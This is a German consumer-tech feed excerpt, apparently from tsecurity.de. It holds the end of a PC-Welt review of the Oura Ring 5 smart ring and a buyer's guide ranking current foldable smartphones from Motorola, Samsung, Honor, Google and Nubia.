<p class="wp-block-paragraph">Sie erhalten zusätzliche Anleitungen sowie Hinweise, die Ihnen helfen, diese stressige Phase Ihrer Woche zu bewältigen. Ich finde, dass sich die Erkenntnisse zur Bereitschaft leichter in die Praxis umsetzen lassen als die zur Belastbarkeit. Wenn Sie sich mehr auf Stress konzentrieren, ist diese Funktion eher auf Sie zugeschnitten.</p>



<h2 class="wp-block-heading">Akkulaufzeit &amp; Aufladen</h2>



<ul class="wp-block-list">
<li>Bis zu 9 Tage Akkulaufzeit</li>



<li>Vollständige Aufladung in 80 Minuten</li>



<li>Optionales Ladecase erhältlich</li>
</ul>



<p class="wp-block-paragraph">Trotz der geringeren Größe gibt Oura an, dass die Akkulaufzeit des Ring 5 nicht beeinträchtigt wird. Demnach hält der Ring 5 zwischen 6 und 9 Tagen durch. Dies steht im Gegensatz zu den für den Oura Ring 4 angegebenen 5 bis 8 Tagen – sie wurde also leicht verbessert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.09.04.png?w=1024" alt="Oura Ring 5" class="wp-image-4197763" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Oura gibt an, das Design überarbeitet und die Akkuleistung mithilfe von Software optimiert zu haben. Ähnlich wie bei den Vorgängermodellen hält dieser Ring eine Woche lang durch, sofern Sie die energieintensivere Blutsauerstoffmessung nicht nutzen.</p>



<p class="wp-block-paragraph">Was die Frage angeht, ob dies die beste Akkulaufzeit unter den derzeit erhältlichen Smart-Ringen ist: Sie reicht noch nicht ganz an die Spitzenwerte heran. Sowohl <a href="https://www.pcwelt.de/article/3063223/ringconn-gen-2-test.html" target="_blank">der RingConn Gen 2</a> als auch die neuesten Ringe von Ultrahuman halten länger, doch der Ring 5 dürfte für die meisten Nutzer ausreichend lange durchhalten.</p>



<p class="wp-block-paragraph">Das Aufladen des Rings erfolgt nach wie vor auf die gleiche Weise. Es handelt sich um dieselbe Art von Ladestation, bei der es über eine Stunde dauern kann, bis der Akku von 0 auf 100 Prozent aufgeladen ist. Wenn Sie eine bequemere und reisefreundlichere Möglichkeit zum Aufladen des Ring 5 wünschen, müssen Sie mehr für das Ladeetui ausgeben, das – genau wie der Ring – <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">mit 109 Euro</a> nicht gerade günstig ist.</p>



<h2 class="wp-block-heading">Preis &amp; Verfügbarkeit</h2>



<p class="wp-block-paragraph">Der Preis für den Oura Ring 5 beginnt bei 429 Euro und kann je nach Ausführung bis zu 529 Euro betragen. Das ist eine Preiserhöhung um 20 Euro gegenüber dem Oura Ring 4, ohne das zusätzliche Abonnement für 5,99 Euro pro Monat oder 69,99 Euro pro Jahr.</p>



<p class="wp-block-paragraph">Damit gehört er zu den teuersten Smart-Ringen auf dem Markt, sodass die Kaufentscheidung nicht ganz so einfach fällt. Vor allem, wenn es mittlerweile auch Modelle ohne Display gibt, wie den <a href="https://www.pcwelt.de/article/3151671/google-fitbit-air-test.html" target="_blank">Fitbit Air</a> für 100 Euro, falls Sie sich nicht unbedingt für einen Ring entscheiden möchten.</p>



<p class="wp-block-paragraph">Er ist jedoch nicht so teuer wie der Ultrahuman Ring Pro und der RingConn Gen 2. Bei diesen Ringen ist jedoch kein Abonnement erforderlich, um auf alle verfügbaren Funktionen zugreifen zu können. Das gilt auch für den <a href="https://www.pcwelt.de/article/3062918/samsung-galaxy-ring-test.html" target="_blank">Samsung Galaxy Ring</a> für 449 Euro.</p>



<p class="wp-block-paragraph">Sie können den Oura Ring 5 im <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">offiziellen Shop</a> sowie bei Anbietern wie <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">Amazon</a> erwerben. Sehen Sie sich unsere Liste der <a href="https://www.pcwelt.de/article/3063681/bester-smart-ring-test.html" target="_blank">besten Smart-Ringe</a> an, um unsere vollständigen Empfehlungen zu erhalten.</p>



<h2 class="wp-block-heading">Sollten Sie den Oura Ring 5 kaufen?</h2>



<p class="wp-block-paragraph">Wenn Sie bereits einen Oura Ring 4 besitzen und mit der Größe sowie dem Aussehen und der Leistung – ob aus Keramik oder in der Standardausführung – zufrieden sind, dann benötigen Sie den Oura Ring 5 wahrscheinlich nicht. Zumal die neuen Softwarefunktionen auch für den Ring 4 verfügbar sein werden.</p>



<p class="wp-block-paragraph">Wenn Sie auf einen kleineren, unauffälligeren Oura gewartet haben, dann ist der Ring 5 genau das Richtige für Sie. Dazu erhalten Sie Zugriff auf dieselben Funktionen und möglicherweise eine längere Akkulaufzeit (sofern Sie mit den Abonnementkosten einverstanden sind).</p>



<p class="wp-block-paragraph">Das Hardware- und Software-Paket macht den Oura Ring nach wie vor zum Maßstab, den es zu übertreffen gilt. Zwar haben Anbieter wie Ultrahuman und Newcomer wie <a href="https://www.pcwelt.de/article/3110713/leep-ring-test.html" target="_blank">der Leep Ring 1</a> gezeigt, dass es auch außerhalb von Oura hervorragende Software gibt. Doch dieser sieht einfach nicht so stilvoll aus, was durchaus wichtig bei einem Smart Ring ist.</p>



<p class="wp-block-paragraph">Ich habe die Nutzung des Oura Ring 5 genossen und glaube, dass das neue, kleinere Design wahrscheinlich mehr Menschen dazu bewegen wird, trotz des Abonnements einen Smart-Ring zu kaufen. Ich wäre aber auch zufrieden damit, wieder zu meinem Oura Ring 4 aus Keramik zurückzukehren. Das zeigt einfach, dass Oura nun zwei starke Ring-Optionen im Angebot hat, bei denen man nicht das Gefühl hat, wichtige Software-Updates zu verpassen, wenn man weniger ausgibt.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li>bis zu 9 Tage Akkulaufzeit</li>



<li>kompatibel mit Android und iOS</li>



<li>2,28 mm dick</li>



<li>ab 2 g Gewicht</li>



<li>wasserdicht bis zu 100 Metern</li>



<li>erfasst den Blutsauerstoffgehalt, die Herzfrequenz, die Körpertemperatur, den Schlaf und die tägliche Aktivität</li>



<li>erfordert ein monatliches oder jährliches Abonnement</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html" data-type="link" data-id="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten faltbaren Smartphones im Test]]></title>
<description><![CDATA[Thomas Deehan / Foundry



Klassische Smartphones mit starrem Gehäuse bleiben praktisch, doch Foldables spielen in vielen Situationen inzwischen in einer eigenen Liga. Sie bieten ein großes Display zum Aufklappen, passen aber weiterhin in die Tasche – ideal für Multitasking, produktives Arbeiten,...]]></description>
<link>https://tsecurity.de/de/3677422/it-security-nachrichten/die-besten-faltbaren-smartphones-im-test/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677422/it-security-nachrichten/die-besten-faltbaren-smartphones-im-test/</guid>
<pubDate>Sat, 18 Jul 2026 06:07:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.50.59.png?w=1024" alt="Die besten faltbaren Smartphones" class="wp-image-4197805" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<p class="wp-block-paragraph">Klassische Smartphones mit starrem Gehäuse bleiben praktisch, doch Foldables spielen in vielen Situationen inzwischen in einer eigenen Liga. Sie bieten ein großes Display zum Aufklappen, passen aber weiterhin in die Tasche – ideal für Multitasking, produktives Arbeiten, Videos, Gaming oder besonders flexible Kamera-Perspektiven.</p>



<p class="wp-block-paragraph">Auch technisch haben faltbare Smartphones deutlich aufgeholt: Die Scharniere sind robuster, die Gehäuse widerstandsfähiger und die Displays alltagstauglicher als bei den ersten Generationen. Wer heute ein Fold- oder Flip-Smartphone kauft, entscheidet sich nicht mehr nur für ein futuristisches Gadget, sondern für eine ernsthafte Smartphone-Alternative. Diese Übersicht zeigt, welche Modelle sich wirklich lohnen und welches Foldable am besten zu Ihren Anforderungen passt.</p>



<h2 class="wp-block-heading">Motorola Razr Fold: Bestes faltbares Smartphone</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.30.36.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4197831" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Motorola Razr Fold mögen</h3>



<p class="wp-block-paragraph">Das Motorola Razr Fold gehört zu den wenigen Buch-Foldables, die sich auch als Hauptgerät nutzen lassen. Verantwortlich dafür sind die abgerundeten Kanten und die griffigen Materialien, die das Gewicht von 243 Gramm angenehm in der Hand verteilen. Das Scharnier ist sauber gespannt und öffnet sich ohne Mühe. Beide Displays überzeugen: außen ein 6,56-Zoll-pOLED mit 165 Hertz, innen ein 8,09-Zoll-Panel mit 2K-Auflösung und nur dezenter Falte. Laut Hersteller erreichen die Bildschirme Spitzenwerte von über 6.000 Nits. Im Test liefern sie ein scharfes, farbtreues Bild. Das Dreifach-50-Megapixel-Kamerasystem macht in fast allen Situationen ansprechende Fotos mit kräftigem Kontrast und weichem Bokeh. Der 6.000-mAh-Akku bringt Sie durch einen normalen Tag und lädt mit bis zu 80 Watt per Kabel sowie 50 Watt kabellos. Dazu gibt es sieben Jahre Android-Updates und den mitgelieferten Moto Pen Ultra.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Leicht ist das Razr Fold nicht: Mit 9,89 Millimetern im geschlossenen Zustand fällt es etwas dicker und schwerer aus als der Samsung-Konkurrent. Der Moto Pen Ultra liegt zwar bei, benötigt aber eine klobige Ladehülle, die niemand gern mitschleppt. Beim Chip setzt Motorola auf den älteren Snapdragon 8 Gen 5, was bei diesem Preis ein Wermutstropfen ist. Hinzu kommen vorinstallierte Drittanbieter-Apps und ein unübersichtliches KI-Angebot.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html" target="_blank">Motorola Razr Fold Test</a></p>



<h2 class="wp-block-heading">Samsung Galaxy Z Fold 7: Bestes faltbares Galaxy-Smartphone</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.30.57.png?w=1024" alt="Samsung Galaxy Z Fold 7" class="wp-image-4197833" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Samsung Galaxy Z Fold 7 mögen</h3>



<p class="wp-block-paragraph">Das Samsung Galaxy Z Fold 7 ist eines der schlanksten Buch-Foldables auf dem Markt. Mit nur 4,2 Millimetern im aufgeklappten Zustand und 215 Gramm fühlt es sich kaum noch wie ein Falt-Smartphone an. Es ist 26 Prozent schlanker als der Vorgänger und wiegt weniger als manches klassische Flaggschiff. Trotzdem sind beide Displays gewachsen: außen 6,5 Zoll im 21:9-Format, innen ein riesiges 8-Zoll-Panel. Beide bieten 120 Hertz und laut Hersteller bis zu 2.600 Nits. Die Falte fällt im Alltag kaum noch auf. Bei den Kameras liegt der größte Sprung beim 200-Megapixel-Hauptsensor des S25 Ultra, der für scharfe, kräftige Fotos sorgt. Das Ultraweitwinkel besitzt nun einen Autofokus und taugt damit auch für Makros. One UI 8 auf Android-16-Basis läuft schnell und zuverlässig. Dazu kommen sieben Jahre Updates und ein breites Galaxy-AI-Angebot. Das Z Fold 7 ist damit das stärkste faltbare Smartphone im Buch-Format.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Beim Akku bleibt Samsung beim bekannten 4.400-mAh-Modul, das nur mit 25 Watt per Kabel und 15 Watt kabellos lädt – chinesische Konkurrenten sind hier deutlich weiter voraus. Der S-Pen-Support entfällt komplett, da der Digitizer fehlt. Beim Spielen drosselt das schlanke Gehäuse die Leistung spürbar, im 3DMark-Stresstest sank die Stabilität auf bis zu 22 Prozent. Auch die Displayhelligkeit sinkt bei Wärme früher als bei vielen Rivalen. Der Listenpreis von rund 2.099 Euro bleibt happig.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank">Samsung Galaxy Z Fold 7 Test</a></p>



<h2 class="wp-block-heading">Samsung Galaxy Z Flip 7: Bestes Klapp-Smartphone</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.31.06.png?w=1024" alt="Samsung Galaxy Z Flip 7" class="wp-image-4197834" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Samsung Galaxy Z Flip 7 mögen</h3>



<p class="wp-block-paragraph">Das Samsung Galaxy Z Flip 7 macht den größten Generationssprung seit dem Debüt der Reihe. Das Außendisplay wächst von 3,4 auf 4,1 Zoll, reicht fast bis zum Rand und löst mit 948 × 1.048 Pixeln scharf auf. Mit 120 Hertz und laut Hersteller bis zu 2.600 Nits ist es endlich flaggschiffwürdig. Das Innendisplay legt auf 6,9 Zoll zu und gehört zu den besten, die Sie aktuell finden. Der Falz bleibt im Betrieb unsichtbar. Das schlanke Gehäuse wiegt nur 188 Gramm und klappt komplett flach zusammen, das Aluminium-Scharnier wirkt robust und langlebig. Die 50-Megapixel-Hauptkamera liefert bei gutem Licht saubere, detailreiche Fotos mit gutem Dynamikumfang und eignet sich auch für Selfies. Im Alltag arbeitet der Exynos 2500 mit 12 GB RAM flüssig und bleibt dabei kühl. Dazu kommen One UI 8 auf Android 16, ein breites Galaxy-AI-Angebot und sieben Jahre Updates.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Beim Akku bleibt das Z Flip 7 mit 4.300 mAh hinter klassischen Smartphones zurück, die oft über 5.000 mAh bieten. Das Laden mit nur 25 Watt per Kabel ist nicht mehr zeitgemäß; eine volle Ladung dauert über 90 Minuten. Ein Teleobjektiv fehlt weiterhin, der digitale Zoom verliert schon ab zweifacher Vergrößerung sichtbar an Schärfe. Beim Gaming kommt es zu Rucklern und Hitzeentwicklung. Hinzu kommt vorinstallierte Bloatware. Der Listenpreis von 1.199 Euro bleibt happig.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2843699/samsung-galaxy-z-flip-7-test.html" target="_blank">Samsung Galaxy Z Flip 7 Test</a></p>



<h2 class="wp-block-heading">Motorola Razr 60 Ultra: Bestes Design</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.31.40.png?w=1024" alt="Motorola Razr 60 Ultra" class="wp-image-4197835" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Motorola Razr 60 Ultra mögen</h3>



<p class="wp-block-paragraph">Das Motorola Razr 60 Ultra gilt als das aktuell beste Klapp-Smartphone auf dem Markt. Das beginnt beim Design: Neben weichem Alcantara gibt es eine Rückseite aus Holz, die angenehm griffig wirkt und Schmutz fernhält. Die IP48-Zertifizierung schützt vor Wasser und gröberem Staub, das Aluminium-Scharnier wirkt stabil und langlebig. Beide Displays überzeugen: außen ein 4-Zoll-AMOLED, innen ein 7-Zoll-Panel, beide mit 165 Hertz und LTPO-Technik, die bis auf 1 Hertz heruntertaktet. Laut Hersteller erreichen sie bis zu 4.500 Nits. Im Inneren steckt der Snapdragon 8 Elite mit 16 GB RAM, der für blitzschnelle Abläufe ohne Verzögerung sorgt. Der 4.700-mAh-Akku hielt im PCMark-Test über 14 Stunden durch und lädt mit bis zu 68 Watt per Kabel sowie 30 Watt kabellos. Besonders gelungen ist die freie App-Nutzung auf dem großen Cover-Display, die Motorola besser löst als die Konkurrenz.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Ein Teleobjektiv fehlt: Statt des früheren 2-fach-Zooms gibt es nun ein Ultraweitwinkel, jenseits zweifacher Vergrößerung lässt die Qualität spürbar nach. Die Hauptkamera kämpft zudem mit Belichtung und Schatten, sodass Fotos mal über-, mal unterbelichtet geraten. Beim längeren Gaming wird die Rückseite schnell unangenehm heiß. Mit nur drei Jahren OS-Updates und vier Jahren Sicherheits-Patches bleibt der Support kurz.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2764578/motorola-razr-60-test.html" target="_blank">Motorola Razr 60 Ultra Pantone Test</a></p>



<h2 class="wp-block-heading">Honor Magic V5: Dünnstes Falt-Smartphone</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.31.48.png?w=1024" alt="Honor Magic V5" class="wp-image-4197837" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Honor Magic V5 mögen</h3>



<p class="wp-block-paragraph">Das Honor Magic V5 zählt zu den stärksten Buch-Foldables auf dem Markt. Es ist extrem schlank: geöffnet misst es laut Hersteller nur 4,1 Millimeter, geschlossen 8,88 Millimeter, bei 217 Gramm. Trotzdem behält Honor anders als Samsung die Stylus-Unterstützung bei. Beide AMOLED-Displays bieten 120 Hertz und LTPO-Technik; das Außendisplay erreicht 1.800 Nits, das Innendisplay 1.300 Nits. Im Inneren arbeitet der Snapdragon 8 Elite in der vollen 8-Kern-Variante mit 16 GB RAM, der sich um weitere 16 GB erweitern lässt. Im Alltag läuft das Gerät flüssig und meistert Multitasking mühelos. Das Kamerasystem aus 50-MP-Hauptsensor, 50-MP-Ultraweitwinkel und 64-MP-Tele liefert detailreiche Fotos. Der 5.820-mAh-Akku hält rund anderthalb Tage und lädt mit bis zu 66 Watt per Kabel sowie 50 Watt kabellos. Dazu gibt es sieben Jahre Updates und eine starke IP58/IP59-Zertifizierung.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">MagicOS ist Geschmackssache: Die Oberfläche wirkt eigenwillig, und manche Funktionen sind sichtbar von Apple und anderen Herstellern inspiriert. Das Hauptdisplay fällt mit 7,95 Zoll etwas kleiner und randbetonter aus als bei der Konkurrenz. Bei wenig Licht geraten Fotos schnell zu dunkel und detailarm. Die Stereo-Lautsprecher klingen flach und basslos. Der Honor-Support hierzulande gilt als durchwachsen, und der Listenpreis von 1.999 Euro bleibt happig.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank">Honor Magic V5 Test</a></p>



<h2 class="wp-block-heading">Google Pixel 10 Pro Fold: Beste Software</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.31.57.png?w=1024" alt="Google Pixel 10 Pro Fold" class="wp-image-4197838" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Google Pixel 10 Pro Fold mögen</h3>



<p class="wp-block-paragraph">Das Google Pixel 10 Pro Fold bringt einige sinnvolle Verbesserungen mit. Als erstes faltbares Smartphone überhaupt erhält es eine IP68-Zertifizierung gegen Staub und Wasser, was es im Außeneinsatz besonders robust macht. Das schon zuvor starke Scharnier wurde weiter verbessert und zählt zu den besten am Markt. Neu sind integrierte Pixelsnap-Magnete, mit denen Sie Qi2-, Magsafe- oder Pixelsnap-Zubehör auch ohne Hülle nutzen. Beide OLED-Displays leuchten heller und erreichen nun 3.000 Nits; das Innendisplay misst 8 Zoll und gehört zu den größten seiner Klasse. Im Inneren arbeitet der Tensor G5, der gegenüber dem Vorgänger spürbar zulegt und genug Leistung für den Alltag liefert. Der 5.015-mAh-Akku hielt im PCMark-Test gut 13 Stunden durch und lädt mit 30 Watt per Kabel sowie 15 Watt kabellos. Dazu gibt es ein reines Android 16, viele Gemini-Funktionen und sieben Jahre Updates.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Im Vergleich zur Konkurrenz wirkt das Pixel altbacken: Das Design ist eher klobig und schwer, die Ränder gehören zu den dicksten unter den aktuellen Flaggschiff-Foldables. Die Falz fällt deutlicher auf als bei Samsung und Honor. Beim Tempo bleibt der Tensor G5 hinter Snapdragon-Geräten zurück, anspruchsvolle Spiele laufen weniger konstant. Die Kameras setzen weiterhin auf betagte 10-Megapixel-Sensoren.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank">Google Pixel 10 Pro Fold Test</a></p>



<h2 class="wp-block-heading">Motorola Razr 60: Bestes Preis-Leistungs-Verhältnis</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.32.06.png?w=1024" alt="Motorola Razr 60" class="wp-image-4197848" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Motorola Razr 60 mögen</h3>



<p class="wp-block-paragraph">Das Motorola Razr 60 ist ein solides kompaktes Flip-Phone zu einem fairen Preis. Das Design wirkt mit den abgerundeten Kanten und der Rückseite aus veganem Leder wärmer und griffiger als beim Samsung-Konkurrenten, zudem lässt es sich leichter aufklappen. Neu ist die verbesserte IP48-Zertifizierung, die zusätzlichen Staubschutz bringt; der Wasserschutz reicht bis 1,5 Meter Tiefe. Beide Displays fallen größer aus als beim Galaxy Z Flip 7 FE: Das 6,9-Zoll-Hauptdisplay bietet 120 Hertz und laut Hersteller bis zu 3.000 Nits, das 3,6-Zoll-Außendisplay umfasst die Kamera. Besonders gelungen ist die durchdachte Cover-Display-Oberfläche, auf der sich viele Apps nutzen lassen. Der größere 4.500-mAh-Akku bringt Sie durch den Tag und lädt mit 30 Watt per Kabel sowie 15 Watt kabellos. Der seitliche Fingerabdrucksensor reagiert zuverlässig, und der Speicher fällt mit 256 GB großzügig aus.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Beim Tempo bleibt das Razr 60 zurück: Der Mediatek Dimensity 7400X gleicht fast dem Vorgänger-Chip, zusammen mit nur 8 GB RAM kommt es immer wieder zu kleinen Verzögerungen. Die Kameras überzeugen nicht, vor allem bei wenig Licht wirken Fotos trüb und detailarm. Gegenüber dem Razr 50 gibt es kaum Fortschritte. Mit nur drei Android-Updates und vier Jahren Sicherheits-Patches bleibt der Support kurz. Der Listenpreis von 699 Euro ist fair.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2934845/motorola-razr-60-test-2.html" target="_blank">Motorola Razr 60 Test</a></p>



<h2 class="wp-block-heading">Samsung Galaxy Z Flip 7 FE: Preis-Tipp</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.32.13.png?w=1024" alt="Samsung Galaxy Z Flip 7 FE" class="wp-image-4197849" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Samsung Galaxy Z Flip 7 FE mögen</h3>



<p class="wp-block-paragraph">Das Samsung Galaxy Z Flip 7 FE ist ein solides Klapp-Smartphone mit nostalgischem Charme zu einem niedrigeren Preis. Das Design entspricht dem Galaxy Z Flip 6 und wirkt mit den flachen Aluminiumkanten und Gorilla Glass Victus 2 hochwertig; die IP48-Zertifizierung hält Wasser und Staub fern. Das 6,7-Zoll-AMOLED-Hauptdisplay passt die Bildwiederholrate zwischen 1 und 120 Hertz an und überzeugt mit kräftigen Farben und tiefen Schwarztönen. Bei der Kamera macht die FE keine Abstriche zum Flaggschiff: Der 50-Megapixel-Hauptsensor liefert in vielen Situationen sehr gute Fotos, und Selfies gelingen über das Cover-Display besonders einfach. Im Alltag arbeitet der Exynos 2400 mit 8 GB RAM flüssig, Apps starten zügig. Dazu kommen One UI 8 auf Android 16, ein breites Galaxy-AI-Angebot und sieben Jahre Updates. Aufgeklappt liegt das Gerät dank stabilem Scharnier flach auf dem Tisch.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Beim Akku bleibt die FE mit 4.000 mAh am unteren Ende der Flip-Klasse; die Laufzeit reicht meist nur knapp durch den Tag. Das Laden mit nur 25 Watt per Kabel ist langsam, eine volle Ladung dauert über anderthalb Stunden. Das Cover-Display fällt mit 3,4 Zoll kleiner und altmodischer aus als bei der Konkurrenz, und das Freischalten von Apps darauf ist umständlich. Der Speicher startet bei knappen 128 GB. Die UVP von rund 939 Euro ist ambitioniert.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2886662/samsung-galaxy-z-flip-7-fe-test-2.html" target="_blank">Samsung Galaxy Z Flip 7 FE Test</a></p>



<h2 class="wp-block-heading">Nubia Flip 5G: Spar-Tipp</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-14.32.22.png?w=1024" alt="Nubia Flip 5G" class="wp-image-4197850" width="1024" height="566" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h3 class="wp-block-heading">Warum wir das Nubia Flip 5G mögen</h3>



<p class="wp-block-paragraph">Das Nubia Flip 5G ist eines der günstigsten Klapp-Smartphones überhaupt und kostet deutlich weniger als ein Razr oder ein Galaxy Z Flip. Sein Design hebt sich durch das runde, von einer Schallplatte inspirierte Außendisplay klar von der Konkurrenz ab. Das Gerät besteht aus geätztem Glas mit Aluminiumrahmen, liegt griffig in der Hand und überstand im Test mehrere Stürze ohne Kratzer. Das 6,9-Zoll-AMOLED-Hauptdisplay löst in Full HD+ auf und bietet bis zu 120 Hertz. Im Inneren arbeitet der Snapdragon 7 Gen 1 mit bis zu 12 GB RAM, der für Alltagsaufgaben und App-Wechsel ausreicht. Die Stereo-Lautsprecher klingen überraschend kräftig und klar. Der 4.310-mAh-Akku hält rund anderthalb Tage und treibt dabei zwei Displays an. Ein passendes 33-Watt-Ladegerät liegt bei und bringt das Gerät in einer halben Stunde auf 76 Prozent. Dazu gibt es Dual-SIM, Wi-Fi 6E und 5G.</p>



<h3 class="wp-block-heading">Weitere Überlegungen</h3>



<p class="wp-block-paragraph">Bei der Software hakt es: MyOS 13 basiert noch auf Android 13 und bringt viel Bloatware mit, von der sich nicht alles entfernen lässt. Garantierte Update-Zusagen fehlen, was die Langzeitnutzung unsicher macht. Die Kameras liefern nur durchwachsene Ergebnisse, vor allem bei wenig Licht und ohne optischen Zoom. Das Hauptdisplay ist nur durch Kunststoff geschützt, und in der Sonne wird es schnell zu dunkel. Eine IP-Zertifizierung fehlt ganz.</p>



<p class="wp-block-paragraph">Lesen Sie unseren <a href="https://www.pcwelt.de/article/2320290/nubia-flip-5g-test.html" target="_blank">Nubia Flip 5G Test</a></p>



<h2 class="wp-block-heading">Welches Foldable passt zu Ihnen?</h2>



<p class="wp-block-paragraph">Beim Kauf eines Foldables kommt es nicht nur auf Prozessor, Kamera und Akkulaufzeit an. Entscheidend ist vor allem die Bauform, denn sie bestimmt, wie sich das Gerät im Alltag anfühlt. Grundsätzlich haben sich mehrere Konzepte etabliert. Flip-Phones lassen sich wie ein klassisches Klapphandy zusammenfalten und passen besonders gut in die Hosentasche. Sie eignen sich für alle, die ein kompaktes Smartphone suchen, aber trotzdem moderne Technik, gute Kameras und ein flexibles Display nutzen möchten. Praktisch ist der Klappmechanismus vor allem für Selfies, Gruppenfotos und Videos, weil das halb geöffnete Gerät wie ein kleiner Ständer funktioniert.</p>



